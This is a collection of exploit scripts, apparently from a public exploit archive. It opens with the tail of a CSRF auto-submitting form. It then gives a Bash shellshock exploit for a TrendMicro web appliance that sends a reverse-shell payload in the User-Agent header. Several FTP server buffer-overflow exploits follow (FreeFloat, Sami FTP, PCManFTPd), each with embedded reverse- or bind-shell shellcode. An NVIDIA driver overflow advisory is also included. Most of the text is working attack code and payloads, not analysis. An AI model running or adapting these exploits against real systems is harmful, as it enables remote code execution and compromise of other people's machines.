<input type="hidden" name="event[description]" value="<p>Meryem AKDOGAN</p> " />
<input type="hidden" name="event[post_rsvp_message]" value="<p>Meryem AKDOGAN</p> " />
<input type="hidden" name="event[calendar_id]" value="1" />
<input type="hidden" name="event[custom_template]" value="" />
<input type="hidden" name="tags" value="meryem" />
<input type="hidden" name="event[starts]" value="2016-10-26 00:00:00" />
<input type="hidden" name="event[ends]" value="2016-10-28 00:00:00" />
<input type="hidden" name="event[start_registrations]" value="2016-10-24 00:00:00" />
<input type="hidden" name="event[close_registration]" value="" />
<input type="hidden" name="event[early_bird_end]" value="" />
<input type="hidden" name="event[online]" value="0" />
<input type="hidden" name="event[location_name]" value="Turkey" />
<input type="hidden" name="event[url]" value="" />
<input type="hidden" name="event[address_line_1]" value="" />
<input type="hidden" name="event[address_line_2]" value="" />
<input type="hidden" name="event[city]" value="" />
<input type="hidden" name="event[state]" value="" />
<input type="hidden" name="event[zip]" value="" />
<input type="hidden" name="event[country]" value="" />
<input type="hidden" name="event[phone]" value="" />
<input type="hidden" name="limit_attendees_dud" value="0" />
<input type="hidden" name="event[max_rsvps]" value="" />
<input type="hidden" name="event[members_only_view]" value="0" />
<input type="hidden" name="event[members_only_rsvp]" value="0" />
<input type="hidden" name="event[allow_guests]" value="1" />
<input type="hidden" name="event[max_guests]" value="1" />
<input type="hidden" name="form[col2][Account Overview]" value="section" />
<input type="hidden" name="form[col2][company_name]" value="1" />
<input type="hidden" name="form[col2][address_line_1]" value="0" />
<input type="hidden" name="form[col2][address_line_2]" value="0" />
<input type="hidden" name="form[col2][city]" value="0" />
<input type="hidden" name="form[col2][state]" value="0" />
<input type="hidden" name="form[col2][zip]" value="0" />
<input type="hidden" name="form[col2][country]" value="0" />
<input type="hidden" name="form[col2][url]" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
#!/usr/bin/env python
# TrendMicro InterScan Web Security Virtul Appliance
# ==================================================
# InterScan Web Security is a software virtual appliance that
# dynamically protects against the ever-growing flood of web
# threats at the Internet gateway exclusively designed to secure
# you against traditional and emerging web threats at the Internet
# gateway. The appliance however is shipped with a vulnerable
# version of Bash susceptible to shellshock (I know right?). An
# attacker can exploit this vulnerability by calling the CGI
# shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
# to perform arbitrary code execution. A limitation of this
# vulnerability is that the attacker must have credentials for
# the admin web interface to exploit this flaw. The panel runs
# over HTTP by default so a man-in-the-middle attack could be
# used to gain credentials and compromise the appliance.
#
# $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
# [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
# [-] Authenticating to '192.168.56.101' with 'admin' 'password'
# [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
# [-] exploiting shellshock CVE-2014-6271...
# bash: no job control in this shell
# bash-4.1$ id
# uid=498(iscan) gid=499(iscan) groups=499(iscan)
#
# -- Hacker Fantastic
#
# (https://www.myhackerhouse.com)
import requests
import sys
import os
def spawn_listener():
os.system("nc -l 8080")
def shellshock(ip,session,cbip):
user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
cookies = {'JSESSIONID': session}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)
def login_http(ip,user,password):
mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
session_cookie = myreq.history[0].cookies.get('JSESSIONID')
print "[-] JSESSIONID = %s" % session_cookie
return session_cookie
if __name__ == "__main__":
print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
if len(sys.argv) < 5:
print "[-] use with <ip> <user> <pass> <connectback_ip>"
sys.exit()
newRef=os.fork()
if newRef==0:
spawn_listener()
else:
session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
shellshock(sys.argv[1],session,sys.argv[4])
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit
# Date: 30/10/2016
# Exploit Author: Cybernetic
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows XP Profesional SP3 ESP x86
# CVE : N/A
import socket, os, sys
ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7
#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
#nc -lvp 443
#Send exploit
shellcode=("\xbb\x89\x62\x48\xda\xdb\xda\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x31\x5a\x12\x03\x5a\x12\x83\x4b\x66\xaa\x2f\xb7\x8f\xa8"
"\xd0\x47\x50\xcd\x59\xa2\x61\xcd\x3e\xa7\xd2\xfd\x35\xe5\xde"
"\x76\x1b\x1d\x54\xfa\xb4\x12\xdd\xb1\xe2\x1d\xde\xea\xd7\x3c"
"\x5c\xf1\x0b\x9e\x5d\x3a\x5e\xdf\x9a\x27\x93\x8d\x73\x23\x06"
"\x21\xf7\x79\x9b\xca\x4b\x6f\x9b\x2f\x1b\x8e\x8a\xfe\x17\xc9"
"\x0c\x01\xfb\x61\x05\x19\x18\x4f\xdf\x92\xea\x3b\xde\x72\x23"
"\xc3\x4d\xbb\x8b\x36\x8f\xfc\x2c\xa9\xfa\xf4\x4e\x54\xfd\xc3"
"\x2d\x82\x88\xd7\x96\x41\x2a\x33\x26\x85\xad\xb0\x24\x62\xb9"
"\x9e\x28\x75\x6e\x95\x55\xfe\x91\x79\xdc\x44\xb6\x5d\x84\x1f"
"\xd7\xc4\x60\xf1\xe8\x16\xcb\xae\x4c\x5d\xe6\xbb\xfc\x3c\x6f"
"\x0f\xcd\xbe\x6f\x07\x46\xcd\x5d\x88\xfc\x59\xee\x41\xdb\x9e"
"\x11\x78\x9b\x30\xec\x83\xdc\x19\x2b\xd7\x8c\x31\x9a\x58\x47"
"\xc1\x23\x8d\xc8\x91\x8b\x7e\xa9\x41\x6c\x2f\x41\x8b\x63\x10"
"\x71\xb4\xa9\x39\x18\x4f\x3a\x86\x75\x4e\xde\x6e\x84\x50\x1f"
"\xd4\x01\xb6\x75\x3a\x44\x61\xe2\xa3\xcd\xf9\x93\x2c\xd8\x84"
"\x94\xa7\xef\x79\x5a\x40\x85\x69\x0b\xa0\xd0\xd3\x9a\xbf\xce"
"\x7b\x40\x2d\x95\x7b\x0f\x4e\x02\x2c\x58\xa0\x5b\xb8\x74\x9b"
"\xf5\xde\x84\x7d\x3d\x5a\x53\xbe\xc0\x63\x16\xfa\xe6\x73\xee"
"\x03\xa3\x27\xbe\x55\x7d\x91\x78\x0c\xcf\x4b\xd3\xe3\x99\x1b"
"\xa2\xcf\x19\x5d\xab\x05\xec\x81\x1a\xf0\xa9\xbe\x93\x94\x3d"
"\xc7\xc9\x04\xc1\x12\x4a\x34\x88\x3e\xfb\xdd\x55\xab\xb9\x83"
"\x65\x06\xfd\xbd\xe5\xa2\x7e\x3a\xf5\xc7\x7b\x06\xb1\x34\xf6"
"\x17\x54\x3a\xa5\x18\x7d")
shell= '\x90'*30 + shellcode
buffer='\x41'*247 + ret + shell + '\x43'*(696-len(shell))
print "Sending Buffer"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.10',21))
s.recv(1024)
s.send('USER test \r\n')
s.recv(1024)
s.send('PASS test \r\n')
s.recv(1024)
s.send('HOST' +buffer+ '\r\n')
s.close()
print "Attack Buffer Overflow Successfully Executed"
#/usr/bin/python
#-*- Coding: utf-8 -*-
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ###
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time...
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write the IP to attack
# * Connect to the same IP on port 4444
#
# BONUS
# =====
# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
# start and so, it will crash and run our shellcode everytime it starts.
# Why?
# ====
# The graphical interface tries to show the user name which produces an overflow overwriting SEH
# Exploit code
# ============
import socket
import struct
def doHavoc(ipaddr):
# Bad chars: 00 0d 0a ff
alignment = "\x90"*3
jmpfront = "345A7504".decode('hex')
#CPU Disasm
#Hex dump Command
# 34 5A XOR AL,5A
# 75 04 JNE SHORT +04
# pop pop ret in tmp01.dll
popret = 0x10022ADE
# fstenv trick to get eip: phrack number 62
# and store it into EAX for the metasploit shell (BufferRegister)
getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
#CPU Disasm
#Hex dump Command
# D9EE FLDZ
# D934E4 FSTENV SS:[ESP]
# 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]
# 04 0B ADD AL,0B
# Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
shellcode = (
getEIPinEAX +
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
"ioJuAA"
)
# Final payload, SEH overwrite ocurrs at 600 bytes
payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
try:
s = socket.create_connection((ipaddr, 21))
s.send("USER "+ payload +"\r\n" )
print s.recv(4096)
s.send("PASS "+ payload +"\r\n" )
print s.recv(4096)
print s.recv(4096)
except e:
print str(e)
exit("[+] Couldn't connect")
if __name__ == "__main__":
ipaddr = raw_input("[+] IP: ")
doHavoc(ipaddr)
while raw_input("[?] Got shell?(y/n) ").lower() == "n":
doHavoc(ipaddr)
print "[+] Enjoy..."
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF ABOR Command
# Date: 29/10/2016
# Exploit Author: Ger
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 2002 Service Pack 3
# CVE : n/a
import socket
#shellcode with metasploit
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c
#nc -lvp 443
#send the exploit
ret='\x73\x18\x6E\x74' #MSCTF.dll
shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1"
"\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe"
"\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28"
"\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x47\x79\xe1\x8d\xf4\xb9\x60"
"\x0e\x07\xee\x42\x2f\xc8\xe3\x83\x68\x35\x09\xd1\x21\x31\xbc"
"\xc5\x46\x0f\x7d\x6e\x14\x81\x05\x93\xed\xa0\x24\x02\x65\xfb"
"\xe6\xa5\xaa\x77\xaf\xbd\xaf\xb2\x79\x36\x1b\x48\x78\x9e\x55"
"\xb1\xd7\xdf\x59\x40\x29\x18\x5d\xbb\x5c\x50\x9d\x46\x67\xa7"
"\xdf\x9c\xe2\x33\x47\x56\x54\x9f\x79\xbb\x03\x54\x75\x70\x47"
"\x32\x9a\x87\x84\x49\xa6\x0c\x2b\x9d\x2e\x56\x08\x39\x6a\x0c"
"\x31\x18\xd6\xe3\x4e\x7a\xb9\x5c\xeb\xf1\x54\x88\x86\x58\x31"
"\x7d\xab\x62\xc1\xe9\xbc\x11\xf3\xb6\x16\xbd\xbf\x3f\xb1\x3a"
"\xbf\x15\x05\xd4\x3e\x96\x76\xfd\x84\xc2\x26\x95\x2d\x6b\xad"
"\x65\xd1\xbe\x62\x35\x7d\x11\xc3\xe5\x3d\xc1\xab\xef\xb1\x3e"
"\xcb\x10\x18\x57\x66\xeb\xcb\x98\xdf\xb9\x8f\x71\x22\x3d\x91"
"\x3a\xab\xdb\xfb\x2c\xfa\x74\x94\xd5\xa7\x0e\x05\x19\x72\x6b"
"\x05\x91\x71\x8c\xc8\x52\xff\x9e\xbd\x92\x4a\xfc\x68\xac\x60"
"\x68\xf6\x3f\xef\x68\x71\x5c\xb8\x3f\xd6\x92\xb1\xd5\xca\x8d"
"\x6b\xcb\x16\x4b\x53\x4f\xcd\xa8\x5a\x4e\x80\x95\x78\x40\x5c"
"\x15\xc5\x34\x30\x40\x93\xe2\xf6\x3a\x55\x5c\xa1\x91\x3f\x08"
"\x34\xda\xff\x4e\x39\x37\x76\xae\x88\xee\xcf\xd1\x25\x67\xd8"
"\xaa\x5b\x17\x27\x61\xd8\x27\x62\x2b\x49\xa0\x2b\xbe\xcb\xad"
"\xcb\x15\x0f\xc8\x4f\x9f\xf0\x2f\x4f\xea\xf5\x74\xd7\x07\x84"
"\xe5\xb2\x27\x3b\x05\x97")
buffer='\x90'*20 + shellcode
buffer1='\x41'*247 + ret + buffer + '\x43'*(696-len(buffer))
print "Sending Buffer"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.74.133', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('ABOR' + buffer1 + '\r\n')
s.close()
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
#Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command
#Date: 29 Octubre 2016
#Exploit Author: Karri93
#Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#Version: 1.0
#Tested on: Windows XP Profesional SP3 Spanish x86
#Shellcode Metasploit:
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
#nc -lvp 443
ret= "\x2F\x1D\xF1\x77" #GDI32.dll
shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
"\xce\x7e\xdd\x9a\xef\xaa")
buffer= '\x90'*30 + shellcode
buffer1= '\x41' * 248 + ret + buffer + '\x43'*(696-len(buffer))
print "Sending..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.1.150',21))
s.recv(1024)
s.send('USER free\r\n')
s.recv(1024)
s.send('PASS free\r\n')
s.recv(1024)
s.send('RMD' + buffer1 + '\r\n')
s.close()
from ftplib import FTP
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: PCmanftpd_delete_command_remotecode_exploit_Win7_x64_HUN_ENG
# Date: 2016.10.31
# Exploit Author: Greg Priest
# Version: Pcmanftpd 2.0.7
# Tested on: Windows 7 Enterprise x64 HUN/ENG
'''
ftp_ip = raw_input("FTP server IP:")
overflow = 'A' * 2005
eip = '\xCA\x96\xC9\x76' + '\x90' * 10
shellcode=(
"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
remotecode = overflow + eip + shellcode
ftp = FTP(ftp_ip)
ftp.login('anonymous', 'hacker@hacker.net')
print ftp.login
print '''
Successfull Exploitation!
'''
FTP.delete(ftp, remotecode)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=947
The escape handler for 0x10000e9 lacks bounds checks, and passes a user
specified size as the size to memcpy, resulting in a stack buffer overflow:
bool escape_10000e9(NvMiniportDeviceContext *a1, Escape10000e9 *escape) {
...
LOBYTE(a9) = escape_->unknown_5[1] != 0;
LOBYTE(a8) = escape_->unknown_5[0] != 0;
if ( !sub_DC57C(
*(_QWORD *)(*(_QWORD *)(v4 + 104) + 1000i64),
escape_->unknown_1,
escape_->unknown_2,
escape_->unknown_3,
escape_->unknown_4,
escape_->data,
escape_->size,
a8,
a9,
&escape_->unknown_5[2]) )
return 0;
escape_->header.result = 1;
return 1;
}
char sub_DC57C(...) {
...
// escape_buf is escape_->data from previous function
// buf_size is escape->size
memcpy(&stack_buf, escape_buf, (unsigned int)buf_size);
...
Crashing context (Win 10 x64, 372.54):
DRIVER_OVERRAN_STACK_BUFFER (f7)
A driver has overrun a stack-based buffer. This overrun could potentially
allow a malicious user to gain control of this machine.
...
STACK_TEXT:
ffffd000`263bc188 fffff803`9d1deaf2 : 9d919d43`2d3cc8a7 00000000`000000f7 ffffd000`263bc2f0 fffff803`9d03c848 : nt!DbgBreakPointWithStatus
ffffd000`263bc190 fffff803`9d1de4c3 : 00000000`00000003 ffffd000`263bc2f0 fffff803`9d16c600 00000000`000000f7 : nt!KiBugCheckDebugBreak+0x12
ffffd000`263bc1f0 fffff803`9d15fa44 : 00000000`00000000 00000000`00000000 00000000`00000000 ffffc000`494d4764 : nt!KeBugCheck2+0x893
ffffd000`263bc900 fffff800`ad8c2bc6 : 00000000`000000f7 9d919d43`2d3cc8a7 0000f6ec`74dc94fc ffff0913`8b236b03 : nt!KeBugCheckEx+0x104
ffffd000`263bc940 fffff800`ad7fc6f7 : c0004492`55400400 ffff8000`00000000 ffffc000`44925540 00000000`00000000 : nvlddmkm+0x192bc6
ffffd000`263bc980 ffffc000`585e78a0 : 00000000`000005d4 00430043`00310030 4666744e`03610107 00000000`00000000 : nvlddmkm+0xcc6f7
ffffd000`263bce70 00000000`000005d4 : 00430043`00310030 4666744e`03610107 00000000`00000000 00000c48`01380702 : 0xffffc000`585e78a0
ffffd000`263bce78 00430043`00310030 : 4666744e`03610107 00000000`00000000 00000c48`01380702 00010000`000166c2 : 0x5d4
ffffd000`263bce80 4666744e`03610107 : 00000000`00000000 00000c48`01380702 00010000`000166c2 00000000`00000000 : 0x00430043`00310030
ffffd000`263bce88 00000000`00000000 : 00000c48`01380702 00010000`000166c2 00000000`00000000 00000000`00000000 : 0x4666744e`03610107
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40668.zip
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
# Date: 29/10/2016
# Exploit Author: Eagleblack
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows XP Profesional SP3 Spanish version x86
# CVE : N/A
#Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a
# long chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry
# he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain
# a remote code execution on the system that is running the FTP Server, in this case Windows XP.
import socket
ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer
#Metasploit shellcode:
#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
"\x33\x93\xbd\x45\x33\xb6")
buffer = '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target
s.recv(1024) #FTPBanner
s.send('USER \r\n') #Sending USER (Null user)
s.recv(1024)
s.send('PASS \r\n') #Sending Password (Null password)
s.recv(1024)
s.send('RENAME' + buffer +'\r\n')
s.close()